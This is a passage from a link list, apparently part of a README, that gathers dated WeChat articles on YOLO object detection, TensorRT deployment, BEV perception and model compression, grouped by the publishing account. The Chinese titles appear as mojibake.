่ฝป้‡็บง้ชจๅนฒ็ฝ‘็ปœ](https://mp.weixin.qq.com/s/ilCMYZmG_XpvJ_ysB1cgkw) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ่‡ชๅŠจ้ฉพ้ฉถไน‹ๅฟƒใ€ - [2022-10-26๏ผŒๆ‰‹ๆŠŠๆ‰‹ๆ•™ๅญฆ๏ผTensorRT้ƒจ็ฝฒๅฎžๆˆ˜๏ผšYOLOv5็š„ONNXๆจกๅž‹้ƒจ็ฝฒ](https://mp.weixin.qq.com/s/M47rwwbU0FRrgd-Xg9c7ww) - [2022-11-12๏ผŒSSDA-YOLO๏ผš็”จไบŽ่ทจๅŸŸ็›ฎๆ ‡ๆฃ€ๆต‹็š„ๅŠ็›‘็ฃๅŸŸ่‡ช้€‚ๅบ”YOLOๆ–นๆณ•](https://mp.weixin.qq.com/s/FFRsxSaTeGvs1ssKGCD6lg) - [2022-11-30๏ผŒ่พพๆ‘ฉ้™ข | DAMO-YOLO๏ผšๅ…ผ้กพ้€ŸๅบฆไธŽ็ฒพๅบฆ็š„ๆ–ฐ็›ฎๆ ‡ๆฃ€ๆต‹ๆก†ๆžถ](https://mp.weixin.qq.com/s/QYsCzgMhW9Mfsa6CYolVuQ) - [2022-12-23๏ผŒ้€š็”จๅฐ็›ฎๆ ‡Trick | ๆทฑๅบฆๅญฆไน ๆฃ€ๆต‹ๅฐ็›ฎๆ ‡ๅธธ็”จๆ–นๆณ•็›˜็‚น](https://mp.weixin.qq.com/s/WRVjub3ePxWoCBQXKhS__w) - [2023-01-12๏ผŒ็บฏ้‡ไบง็ป้ชŒ | ่ฐˆ่ฐˆ็›ฎๆ ‡ๆฃ€ๆต‹ไธญๆญฃ่ดŸๆ ทๆœฌ็š„้—ฎ้ข˜](https://mp.weixin.qq.com/s/esGe2o3_pPXUlrysZoCQKQ) - [2023-05-15๏ผŒๆœ€ๆ–ฐ๏ผ่‡ชๅŠจ้ฉพ้ฉถไธญ็”จไบŽ็›ฎๆ ‡ๆฃ€ๆต‹ๅ’Œ่ฏญไน‰ๅˆ†ๅ‰ฒ็š„Radar-Camera่žๅˆ็ปผ่ฟฐ](https://mp.weixin.qq.com/s/EHTXisVDv7SV4UEbo7sdbQ) - [2023-05-19๏ผŒ25FPS๏ผ่‹ฑไผŸ่พพ้ฆ–ๅ‘BEVFusion้ƒจ็ฝฒๆบไปฃ็ ๏ผŒ่พน็ผ˜็ซฏๅฎžๆ—ถ่ฟ่กŒ๏ผ๏ผ๏ผ](https://mp.weixin.qq.com/s/79DskdwwSghyldvQF43l6A) - [2023-05-21๏ผŒไฟๅง†็บงๅผ€ๆบๆ•™็จ‹ | ๆ‰‹ๆŠŠๆ‰‹ๆ•™ไฝ ้ƒจ็ฝฒFreeYOLO](https://mp.weixin.qq.com/s/AhPaSVl2Gh8zWtJ74IUyzw) - [2023-05-29๏ผŒๆœ€ๆ–ฐSOTA๏ผBEVFusion4D๏ผšBEVFusionๅ‡็บง็‰ˆ3Dๆฃ€ๆต‹ๆ—ถ็ฉบๆ–ฐๆก†ๆžถ๏ผ](https://mp.weixin.qq.com/s/i3lLadD3_Q5RX5D0JUocPQ) - [2023-06-04๏ผŒไธ‡ๅญ—้•ฟๆ–‡ | TransformerๅœจBEVใ€2D/3Dๆฃ€ๆต‹ไธŠ็š„ๅบ”็”จใ€้‡ๅŒ–ไธŽๅŠ ้€Ÿ๏ผ](https://mp.weixin.qq.com/s/sEWfs2C62cuThZBXSM0fZA) - [2023-06-15๏ผŒๅ…จๆžๅฎš๏ผๅŸบไบŽTensorRT็š„CNN/Transformer/ๆฃ€ๆต‹/BEVๆจกๅž‹ๅ››ๅคง้ƒจ็ฝฒไปฃ็ +CUDAๅŠ ้€Ÿ๏ผ](https://mp.weixin.qq.com/s/WjBvj6hCWEYs7IL9DlrK2Q) - 
[2023-08-23๏ผŒๆจกๅž‹้ƒจ็ฝฒ๏ผŒไปŠๅนด็š„้ฆ™้ฅฝ้ฅฝ๏ผTensorRT่ฏฆ็ป†ๅ…ฅ้—จๆŒ‡ๅŒ—](https://mp.weixin.qq.com/s/KsPb80tf_zxPyP0xu8ZmHA) - [2024-01-10๏ผŒYOLO่ฟ›ๅ†›BEVๆ„Ÿ็Ÿฅ๏ผYOLO+BEVๅœจๅฎžๆ—ถๆฃ€ๆต‹ไธŠ็š„ๅฐ่ฏ•](https://mp.weixin.qq.com/s/8pceyAzzGvwKNnRE9OJEOA) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒCVHubใ€ - [2023-01-07๏ผŒ็Žฐไปฃ็›ฎๆ ‡ๆฃ€ๆต‹ๆ•…ไบ‹ | 40+็ง็ฝ‘็ปœๆžถๆž„ๅคง็›˜็‚น๏ผไปŽๅŸบ็ก€ๆžถๆž„ResNetๅˆฐๆœ€ๅผบๆฃ€ๆต‹ๅ™จYolov7ๅ†ๅˆฐๆœ€ๆ–ฐ้ƒจ็ฝฒ็ฅžๅ™จGhostNetV2](https://mp.weixin.qq.com/s/22rRzyZj93-Y4msYwa_LKQ) - [2023-02-19๏ผŒ้˜ฟ้‡Œๅ›ข้˜Ÿๆ–ฐไฝœ | ๆŽข่ฎจ YOLOv5 ็š„้ซ˜ๆ•ˆ่ฟ›้˜ถไน‹่ทฏ๏ผ](https://mp.weixin.qq.com/s/B0yHtFMTO5gwt0B-ra18QA) - [2023-05-05๏ผŒ่ถ…ๅผบ็›ฎๆ ‡ๆฃ€ๆต‹ๅ™จ RT-DETR | Python/C++ ไฟๅง†็บง้ƒจ็ฝฒๆ•™็จ‹๏ผŒไปŽๅ…ฅ้—จๅˆฐ็ฒพ้€š](https://mp.weixin.qq.com/s/W56LHZbZEqqoCPFVf612FA) - [2023-06-04๏ผŒไธญ็ง‘้™ขไธ€ๅŒบ้กถๅˆŠ TCSVT 2023 | DIAL-Filters: ๆ˜พ่‘—ๆๅ‡ๆจก็ณŠๅคœ่ง†ๅœบๆ™ฏไธ‹็š„ๆฃ€ๆต‹ๅ’Œๅˆ†ๅ‰ฒๆ€ง่ƒฝ๏ผ](https://mp.weixin.qq.com/s/qPbxjDuPOFSD2zsWAGmLQw) - [2023-07-12๏ผŒๅŒ—่ˆชๆ–ฐไฝœ | Q-YOLO: ๅŸบไบŽ TensorRT ๅ’Œ OpenVIVO ็š„็›ฎๆ ‡ๆฃ€ๆต‹้‡ๅŒ–ๅฎžๆˆ˜ๆ–นๆกˆ](https://mp.weixin.qq.com/s/Us7IiYXFtUoQJ6btpcG1lw) - [2023-07-30๏ผŒๅคง่ฟž็†ๅทฅ่”ๅˆ้˜ฟ้‡Œ่พพๆ‘ฉ้™ขๅ‘ๅธƒHQTrack | ้ซ˜็ฒพๅบฆ่ง†้ข‘ๅคš็›ฎๆ ‡่ทŸ่ธชๅคงๆจกๅž‹](https://mp.weixin.qq.com/s/Jl2mr7tszulZX19Fx4ZNgw) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œไบบๅทฅๆ™บ่ƒฝๆ„Ÿ็Ÿฅไฟกๆฏๅค„็†็ฎ—ๆณ•็ ”็ฉถ้™ขใ€ - [2023-06-15๏ผŒๆ”น่ฟ›YOLOV5ๅฐ็›ฎๆ ‡ๆฃ€ๆต‹ไน‹VisDrone2019ๆ•ฐๆฎ้›†](https://mp.weixin.qq.com/s/GJza38BBYTl6XAWiiEzpHA) - [2023-06-16๏ผŒๆ”น่ฟ›YOLOV5ๅฐ็›ฎๆ ‡ๆฃ€ๆต‹ไน‹ๆ•ฐๆฎ้ข„ๅค„็†ไน‹ไธ€](https://mp.weixin.qq.com/s/BXueTqerYFtGg9MOhJ7YYA) - [2023-06-17๏ผŒๆ”น่ฟ›YOLOV5ๅฐ็›ฎๆ ‡ๆฃ€ๆต‹ไน‹ๆ•ฐๆฎ้ข„ๅค„็†ไน‹ไบŒ](https://mp.weixin.qq.com/s/NblhcYo-JWZuJkMS5015sw) - [2023-06-22๏ผŒๆ”น่ฟ›YOLOV5ๅฐ็›ฎๆ ‡ๆฃ€ๆต‹ๆถˆ่žๅฎž้ชŒไน‹ไธ€](https://mp.weixin.qq.com/s/3_03EmF0wo4hmbes5o37NQ) - [2023-06-23๏ผŒๆ”น่ฟ›YOLOV5ๅฐ็›ฎๆ ‡ๆฃ€ๆต‹ๆถˆ่žๅฎž้ชŒไน‹ไบŒ](https://mp.weixin.qq.com/s/iEEGkLFICJT03kXWQwR_sA) - [2023-07-04๏ผŒๅŸบไบŽๆ”น่ฟ›YOLOv5ๅ’Œๅฏๅ˜ๅฝขๅท็งฏ็š„ๆฐดไธ‹็พคไฝ“็›ฎๆ ‡ๆฃ€ๆต‹ๆฆ‚่ฟฐไน‹ไธ€](https://mp.weixin.qq.com/s/ZIH6Y1d6yeUV-zE6AnEvuQ) - [2023-07-05๏ผŒๅŸบไบŽๆ”น่ฟ›YOLOv5ๅ’Œๅฏๅ˜ๅฝขๅท็งฏ็š„ๆฐดไธ‹็พคไฝ“็›ฎๆ ‡ๆฃ€ๆต‹ๆฆ‚่ฟฐไน‹ไบŒ](https://mp.weixin.qq.com/s/ptkTsyG2_mOFb6lGUCSkVA) - [2023-07-07๏ผŒYOLOV5็ฎ—ๆณ•ๆ”น่ฟ›ไน‹่‡ช้€‚ๅบ”้˜ˆๅ€ผๆจกๅ—](https://mp.weixin.qq.com/s/XSBtVbtcQTrMf13E_HEeWw) - [2023-07-10๏ผŒๆ”น่ฟ›YOLOV5็ฎ—ๆณ•ไน‹ไธๅŒๆ•ฐๆฎ้›†ๆต‹่ฏ•](https://mp.weixin.qq.com/s/-0ZsO9D4o4UXuIy_a2gt0w) - [2023-07-11๏ผŒๆ”น่ฟ›YOLOV5็ฎ—ๆณ•ไธŽๅŒ็ฑป็ฎ—ๆณ•็š„ๆฏ”่พƒ](https://mp.weixin.qq.com/s/KIxhlNBuTnCLnqzKqD_GPA) - [2023-07-12๏ผŒๆ”น่ฟ›YOLOV5่‡ช้€‚ๅบ”้˜ˆๅ€ผๆจกๅ—ๅฎž้ชŒๅˆ†ๆž ](https://mp.weixin.qq.com/s/WffWRa6MzaRN4oMF3BvOWg) - [2023-07-15๏ผŒKAYOLO็ฝ‘็ปœๆจกๅž‹](https://mp.weixin.qq.com/s/rYrdJPHYE57Kc8QzVDxUfg) - [2023-07-19๏ผŒYolov8n-IOUๆŸๅคฑๅ‡ฝๆ•ฐ็š„ๆ”น่ฟ›](https://mp.weixin.qq.com/s/x1WRIC9MNQWMTup9XHkwWg) - [2023-07-26๏ผŒYOLOV7็ฎ—ๆณ•ๅŽŸ็†](https://mp.weixin.qq.com/s/KnLwHIWqespSxO0v82cJ3A) - [2023-07-30๏ผŒFlask ้ƒจ็ฝฒ YOLOV5](https://mp.weixin.qq.com/s/9dwrXEAi5tht4-tNyZ4tYw) - [2023-08-13๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•็š„ๅบ”็”จ](https://mp.weixin.qq.com/s/cX1WlVJqDNePZW18Jlf_Kg) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒOneFlowใ€ - [2022-12-13๏ผŒYOLOv5ๅ…จ้ข่งฃๆžๆ•™็จ‹โ‘ ๏ผš็ฝ‘็ปœ็ป“ๆž„้€่กŒไปฃ็ ่งฃ่ฏป](https://mp.weixin.qq.com/s/qfZIKgBdHNwPDp5ng0Y_Qw) - [2022-12-22๏ผŒYOLOv5ๅ…จ้ข่งฃๆžๆ•™็จ‹โ‘ก๏ผšๅฆ‚ไฝ•ๅˆถไฝœ่ฎญ็ปƒๆ•ˆๆžœๆ›ดๅฅฝ็š„ๆ•ฐๆฎ้›†](https://mp.weixin.qq.com/s/t4Ppf2qokpClRwCN52zF-g) - [2023-02-02๏ผŒYOLOv5ๅ…จ้ข่งฃๆžๆ•™็จ‹โ‘ข๏ผšๆ›ดๅฟซๆ›ดๅฅฝ็š„่พน็•Œๆก†ๅ›žๅฝ’ๆŸๅคฑ](https://mp.weixin.qq.com/s/LIOnJqJj_GrpakKbLeWEDQ) - 
[2023-02-17๏ผŒYOLOv5ๅ…จ้ข่งฃๆžๆ•™็จ‹โ‘ฃ๏ผš็›ฎๆ ‡ๆฃ€ๆต‹ๆจกๅž‹็ฒพ็กฎๅบฆ่ฏ„ไผฐ](https://mp.weixin.qq.com/s/nvfAU6TwTDoZhF8zFpCaOw) - [2023-02-24๏ผŒYOLOv5ๅ…จ้ข่งฃๆžๆ•™็จ‹โ‘ค๏ผš่ฎก็ฎ—mAP็”จๅˆฐ็š„Numpyๅ‡ฝๆ•ฐ่ฏฆ่งฃ](https://mp.weixin.qq.com/s/ag7PkcRRSTppEG0GOysqpg) - [2023-03-09๏ผŒYOLOv5ๅ…จ้ข่งฃๆžๆ•™็จ‹โ‘ฅ๏ผšๆจกๅž‹่ฎญ็ปƒๆต็จ‹่ฏฆ่งฃ](https://mp.weixin.qq.com/s/RriWDozw7ZHTBg7Rr38dNw) - [2023-05-23๏ผŒYOLOv5ๅ…จ้ข่งฃๆžๆ•™็จ‹โ‘ฆ๏ผšไฝฟ็”จๆจกๅž‹่žๅˆๆๅ‡mAPๅ’ŒmAR](https://mp.weixin.qq.com/s/6PjD5k5o1GQO8v7jIydZ_w) - [2023-05-23๏ผŒYOLOv5ๅ…จ้ข่งฃๆžๆ•™็จ‹โ‘ง๏ผšๅฐ†่ฎญ็ปƒๅฅฝ็š„YOLOv5ๆƒ้‡ๅฏผไธบๅ…ถๅฎƒๆก†ๆžถๆ ผๅผ](https://mp.weixin.qq.com/s/4yiN7JZrvAvMi4m5eusbMw) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒAIWalkerใ€ - [2023-03-29๏ผŒChatGPTๆ˜ฏๅฆ‚ไฝ•็œ‹ๅพ…YOLO็ณปๅˆ—็ฎ—ๆณ•็š„่ดก็Œฎๅ‘ข๏ผŸ~ๅ“ˆๅ“ˆ~ ](https://mp.weixin.qq.com/s/E-TNeTKK5EV70zAenRVbwQ) - [2023-05-07๏ผŒYOLO-NAS | YOLOๆ–ฐ้ซ˜ๅบฆ๏ผŒๅผ•ๅ…ฅNAS๏ผŒๅ‡บไบŽYOLOv8่€Œไผ˜ไบŽYOLOv8](https://mp.weixin.qq.com/s/FsWSRguAn2WZKtmPhMbc6g) - [2023-05-16๏ผŒๅ…จ็ฝ‘ๅ”ฏไธ€ๅค็Žฐ๏ผๆ‰‹ๆœบ็ซฏ 1ms ็บงๅปถ่ฟŸ็š„ไธปๅนฒ็ฝ‘ๆจกๅž‹ MobileOne](https://mp.weixin.qq.com/s/Wk1sHIQKUe01PqMnpzcCfQ) - [2023-08-15๏ผŒๅ—ๅผ€ๅคงๅญฆๆๅ‡บYOLO-MS | ่ถ…่ถŠYOLOv8ไธŽRTMDet๏ผŒๅณๆ’ๅณ็”จๆ‰“็ ดๆ€ง่ƒฝ็“ถ้ขˆ](https://mp.weixin.qq.com/s/FfG9vNM_a2k_zflWfuimsw) - [2024-02-19๏ผŒU็‰ˆYOLO-Worldๆฅไบ†๏ผŒYOLOv8ๅ†ๅบฆๅ‡็บง๏ผŒไธ‰่กŒไปฃ็ ไธŠๆ‰‹YOLO-World](https://mp.weixin.qq.com/s/yepStVzyrOE4MsgFFuwo0Q) - [2024-02-23๏ผŒYOLOv9ๆฅไบ†๏ผŒๅฏ็ผ–็จ‹ๆขฏๅบฆไฟกๆฏไธŽๅนฟไน‰้ซ˜ๆ•ˆๅฑ‚่šๅˆ็ฝ‘็ปœ ๅŠฉๅŠ›ๅ…จๆ–ฐๆฃ€ๆต‹SOTAๅ‰ๆฒฟ](https://mp.weixin.qq.com/s/tFavH5_Sqtnq1_NMRt_AUg) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ่‘ฃ่‘ฃ็ฟๆ˜ฏไธชๆ”ปๅŸŽ็‹ฎใ€ - [2023-03-20๏ผŒไธ‡ๅญ—้•ฟๆ–‡่งฃๆžResnet50็š„็ฎ—ๆณ•ๅŽŸ็†](https://mp.weixin.qq.com/s/pA86udkaFzCogi2Qw8vBEA) - [2023-04-17๏ผŒไธ‡ๅญ—้•ฟๆ–‡ๅ…ฅ้—จ็ฅž็ป็ฝ‘็ปœ็กฌไปถๅŠ ้€Ÿ](https://mp.weixin.qq.com/s/3aNVGIPf5pLzEv67KI8M5w) - [2023-04-19๏ผŒCUDAๅท็งฏ็ฎ—ๅญๆ‰‹ๅ†™่ฏฆ็ป†ๅฎž็Žฐ](https://mp.weixin.qq.com/s/VlrglazJE54Xnm3tjM0uCg) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ่ฎก็ฎ—ๆœบ่ง†่ง‰ๆผซ่ฐˆใ€ - [2020-02-22๏ผŒYOLO v3ๅฎžๆˆ˜ไน‹้’ข็ญ‹ๆ•ฐ้‡AI่ฏ†ๅˆซ๏ผˆไธ€๏ผ‰](https://mp.weixin.qq.com/s/EElv2Tc73JKS8jpejEGB1w) - [2020-03-07๏ผŒYOLO v3ๅฎžๆˆ˜ไน‹้’ข็ญ‹ๆ™บ่ƒฝ่ฏ†ๅˆซๆ”น่ฟ›ๆ–นๆกˆๅˆ†ไบซ๏ผˆไบŒ๏ผ‰](https://mp.weixin.qq.com/s/lOeRqD2orcLw5FR496r4uw) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๆ™บ้€ ๆƒ…ๆŠฅๅฑ€ใ€ - [2022-11-07๏ผŒ้กน็›ฎๅฎžๆ“๏ผšๅŸบไบŽyolov5็š„PCB่กจ้ข็ผบ้™ทๆฃ€ๆต‹ใ€้™„ๅฎŒๆ•ดไปฃ็ ใ€‘](https://mp.weixin.qq.com/s/IzMabvYts2BEa5IvAwUfrg) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๅญฆๅงๅธฆไฝ ็ŽฉAIใ€ - [2022-11-21๏ผŒYOLOv5+Tesseract-OCR ๅฎž็Žฐ่ฝฆ็‰Œๅทๆ–‡ๆœฌ่ฏ†ๅˆซใ€ๅฎžๆˆ˜ใ€‘](https://mp.weixin.qq.com/s/52Woexamu697tozevSiyQQ) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ้‡ๅญไฝใ€ - [2023-01-12๏ผŒYOLOv8ๅทฒ่‡ณ๏ผŒ็ฒพๅบฆๅคงๆถจ๏ผๆ•™ไฝ ๅฆ‚ไฝ•ๅœจ่‡ชๅฎšไน‰ๆ•ฐๆฎ้›†ไธŠ่ฎญ็ปƒๅฎƒ](https://mp.weixin.qq.com/s/_ccYfjWm6CsH_vxpACUWEA) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ็ฌ‘ๅ‚ฒ็ฎ—ๆณ•ๆฑŸๆน–ใ€ - [2023-02-08๏ผŒไปฃ็ ๅฎžๆˆ˜๏ผšYOLOv5ๅฎž็Žฐ้’ขๆ่กจ้ข็ผบ้™ทๆฃ€ๆต‹](https://mp.weixin.qq.com/s/i_bF6_77MxKqEy7-y7LQdQ) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒOpenCVไธญๆ–‡็ฝ‘ใ€ - [2023-04-07๏ผŒYOLOv8 ๅ…จๅฎถๆกถๅ†่ฟŽๆ–ฐๆˆๅ‘˜๏ผๆ–ฐๅขžPose Estimationๆจกๅž‹!](https://mp.weixin.qq.com/s/wF93AAVnGsQtHdB-DkSTPQ) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๆทฑๅบฆๅญฆไน ไธŽ่ฎก็ฎ—ๆœบ่ง†่ง‰ใ€ - [2023-03-28๏ผŒไฝฟ็”จ YOLO ่ฟ›่กŒ็›ฎๆ ‡ๆฃ€ๆต‹๏ผšๅฆ‚ไฝ•ๆๅ–ไบบ็‰ฉๅ›พๅƒ](https://mp.weixin.qq.com/s/vthdOoy3etZmybMLaGzoFg) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๆœบๅ™จๅญฆไน ็ฎ—ๆณ•ๅทฅ็จ‹ๅธˆใ€ - [2023-04-19๏ผŒๆƒŠๅ‘†ไบ†๏ผๅŸบไบŽTransformer็š„ๆฃ€ๆต‹ๆจกๅž‹RT-DETR็ซŸ็„ถๆฏ”YOLO่ฟ˜ๅฟซ๏ผ](https://mp.weixin.qq.com/s/wgBaZ-CTB7B4nvYnobMDvw) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ่ฎก็ฎ—ๆœบ่ง†่ง‰ไธŽๆœบๅ™จๅญฆไน ใ€ - [2023-04-19๏ผŒRT-DETR | 
ๅŠๆ‰“YOLO็ณปๅˆ—็š„ DETR้ƒจ็ฝฒๆ•™็จ‹ๆฅๅ•ฆ๏ผŒไผ˜้›…่€Œ็ฎ€ๆด๏ผ](https://mp.weixin.qq.com/s/oflfbPkhj3ka2ExK7ZZ0VA) - [2023-05-16๏ผŒ่ถ…ๅผบ็›ฎๆ ‡ๆฃ€ๆต‹ๅ™จ RT-DETR | Python/C++ ไฟๅง†็บง้ƒจ็ฝฒๆ•™็จ‹๏ผŒไปŽๅ…ฅ้—จๅˆฐ็ฒพ้€š](https://mp.weixin.qq.com/s/XwmQILnaLtWPfo-dysLeAA) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œไบบๅทฅๆ™บ่ƒฝๅ‰ๆฒฟ่ฎฒไน ใ€ - [2023-04-19๏ผŒใ€ๆบๅคดๆดปๆฐดใ€‘CVPR 2023 | AbSViT๏ผšๆ‹ฅๆœ‰่‡ชไธŠ่€Œไธ‹ๆณจๆ„ๅŠ›ๆœบๅˆถ็š„่ง†่ง‰Transformer](https://mp.weixin.qq.com/s/FtVd37tOXMfu92eDSvdvbg) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒAI็ง‘ๆŠ€ไธŽ็ฎ—ๆณ•็ผ–็จ‹ใ€ - [2023-04-11, YOLOv8 AS-One๏ผš็›ฎๆ ‡ๆฃ€ๆต‹AS-One ๆฅไบ†๏ผ๏ผˆYOLOๅฐฑๆ˜ฏๅๅ‰ฏๅ…ถๅฎž็š„ๅท็Ž‹ไน‹็Ž‹๏ผ‰](https://mp.weixin.qq.com/s/ofokLwCwgN1GNTqy3NuYmg) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๆทฑๅบฆๅญฆไน ไธŽNLPใ€ - [2023-04-24๏ผŒ[ไธ‡ๅญ—ๅนฒ่ดง]-ๅฆ‚ไฝ•็ป™ๆจกๅž‹ๅŠ ๅ…ฅๅ…ˆ้ชŒ็Ÿฅ่ฏ†๏ผŸ](https://mp.weixin.qq.com/s/RmM9ay4arJWBoNP11Bfbsw) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒOpenCVไธŽAIๆทฑๅบฆๅญฆไน ใ€ - [2023-04-23๏ผŒๅŸบไบŽ YOLOv8 ็š„่‡ชๅฎšไน‰ๆ•ฐๆฎ้›†่ฎญ็ปƒ](https://mp.weixin.qq.com/s/NrT7aFurdz5IRr3bCFsHQA) - [2023-06-19๏ผŒไธ€ๆ–‡ๅฝปๅบ•ๆžๆ‡‚YOLOv8ใ€็ฝ‘็ปœ็ป“ๆž„+ไปฃ็ +ๅฎžๆ“ใ€‘](https://mp.weixin.qq.com/s/HldcdtBXzh5YawcS0Bb4KQ) - [2023-07-04๏ผŒไฟๅง†ๆ•™็จ‹ | YOLOv5ๅœจๅปบ็ญ‘ๅทฅๅœฐไธญๅฎ‰ๅ…จๅธฝไฝฉๆˆดๆฃ€ๆต‹็š„ๅบ”็”จ](https://mp.weixin.qq.com/s/g6jEP5Y2R_DhrI30DBol5Q) - [2024-06-05๏ผŒๅฎžๆˆ˜ | YOLOv10 ่‡ชๅฎšไน‰ๆ•ฐๆฎ้›†่ฎญ็ปƒๅฎž็Žฐ่ฝฆ็‰Œๆฃ€ๆต‹ (ๆ•ฐๆฎ้›†+่ฎญ็ปƒ+้ข„ๆต‹ ไฟๅง†็บงๆ•™็จ‹)](https://mp.weixin.qq.com/s/3WSmGP7xdQJc-5YdQXBPFg) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒๅตŒๅ…ฅๅผ่ง†่ง‰ใ€ - [2023-04-28๏ผŒๆทฑๅบฆๅญฆไน ๆจกๅž‹ๅŽ‹็ผฉๆ–นๆณ•ๆฆ‚่ฟฐ](https://mp.weixin.qq.com/s/m4gZ1beM8QRzNegFPf3Mbg) - [2023-05-12๏ผŒๆจกๅž‹ๅŽ‹็ผฉ-ๅ‰ชๆž็ฎ—ๆณ•่ฏฆ่งฃ](https://mp.weixin.qq.com/s/7BCQD1s_1AZJoowivTnxOg) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๆœบๅ™จๅญฆไน ็ฎ—ๆณ•้‚ฃไบ›ไบ‹ใ€ - [2023-05-02๏ผŒlabelGo๏ผšๅŸบไบŽ YOLOv5 ็š„่พ…ๅŠฉๆ ‡ๆณจๅทฅๅ…ท](https://mp.weixin.qq.com/s/4EFTj6RxOCvX2Wn5euhSAQ) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œไบบๅทฅๆ™บ่ƒฝๆŠ€ๆœฏไธŽๅ’จ่ฏขใ€ - [2023-05-19๏ผŒๅŸบไบŽYOLOv5็š„ๅ…‰ๅญฆ้ฅๆ„Ÿๅ›พๅƒ่ˆฐ่ˆน็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•](https://mp.weixin.qq.com/s/Mic_wLbfjQrtX7wLwW1SiA) - [2023-06-06๏ผŒ้ขๅ‘ๅผน่ฝฝๅ›พๅƒ็š„ๆทฑๅบฆๅญฆไน ็ฝ‘็ปœๅŽ‹็ผฉๆ–นๆณ•็ ”็ฉถ](https://mp.weixin.qq.com/s/pBXUnMpSmLg1BTDrJ19tgQ) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒStrongerTangใ€ - [2022-10-07๏ผŒ่‡ชๅŠจ้ฉพ้ฉถๅคšๆจกๆ€่žๅˆๆ„Ÿ็Ÿฅ่ฏฆ่งฃ๏ผˆ็ ”็ฉถ็Žฐ็ŠถๅŠๆŒ‘ๆˆ˜๏ผ‰](https://mp.weixin.qq.com/s/g3KpWyc0QpLseN5-0CKySQ) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒๅŒ—ไบฌๅคงๅญฆ็Ž‹้€‰่ฎก็ฎ—ๆœบ็ ”็ฉถๆ‰€ใ€ - [2022-10-12๏ผŒNeurIPS 2022 | ้ขๅ‘่‡ชๅŠจ้ฉพ้ฉถๅคšๆจกๆ€ๆ„Ÿ็Ÿฅ็š„ๆฟ€ๅ…‰้›ท่พพ-็›ธๆœบ่žๅˆๆก†ๆžถ](https://mp.weixin.qq.com/s/anth7mIqTGpJ4QWvTDbiSQ) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ่ฎก็ฎ—ๆœบ่ง†่ง‰ๆทฑๅบฆๅญฆไน ๅ’Œ่‡ชๅŠจ้ฉพ้ฉถใ€ - [2022-05-31๏ผŒBEVFusion: ๅŸบไบŽ็ปŸไธ€BEV่กจๅพ็š„ๅคšไปปๅŠกๅคšไผ ๆ„Ÿๅ™จ่žๅˆ](https://mp.weixin.qq.com/s/maKDU3sXbPxlEFz372qZTA) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๅ†…ๆŽจๅ›SIRใ€ - [2023-07-28๏ผŒ้ข็ป | ่ฎก็ฎ—ๆœบ่ง†่ง‰ ้ข็ป22](https://mp.weixin.qq.com/s/3pUMSOq4-eS2N7WNtbv02A) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๅคๆœˆๅฑ…ใ€ - [2023-07-06๏ผŒYOLOv5่ฎญ็ปƒ่‡ชๅทฑ็š„ๆ•ฐๆฎ้›†(่ถ…่ฏฆ็ป†)](https://mp.weixin.qq.com/s/UshIczcC8l7eHNf2CSrMKw) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒStreamlitใ€ - [2023-05-18๏ผŒStreamlit+Opencvๆ‰“้€ ไบบ่„ธๅฎžๆ—ถ่ฏ†ๅˆซๅŠŸ่ƒฝ](https://mp.weixin.qq.com/s/I1HQ_E4UerZLkDT2-ch2SQ) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒFightingCVใ€ - [2022-08-17๏ผŒYOLOAir | ้ขๅ‘ๅฐ็™ฝ็š„็›ฎๆ ‡ๆฃ€ๆต‹ๅบ“๏ผŒๆ›ดๅฟซๆ›ดๆ–นไพฟๆ›ดๅฎŒๆ•ด็š„YOLOๅบ“](https://mp.weixin.qq.com/s/smwx-Ievs3rWMw_D4lSwqg) - [2023-07-29๏ผŒ่‡ชๅŠจ้ฉพ้ฉถๆ–ฐๆ–นๆณ•็™ปNatureๅฐ้ข๏ผš่ฎฉ้ป‘ๅคœๅฆ‚็™ฝๆ˜ผ่ˆฌๆธ…ๆ™ฐ๏ผŒๆต™ๅคงๅšๅฃซไธ€ไฝœ](https://mp.weixin.qq.com/s/bCUMjzc-Ws0_qjusFjM5Xw) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒAILab็ฌ”่ฎฐใ€ - 
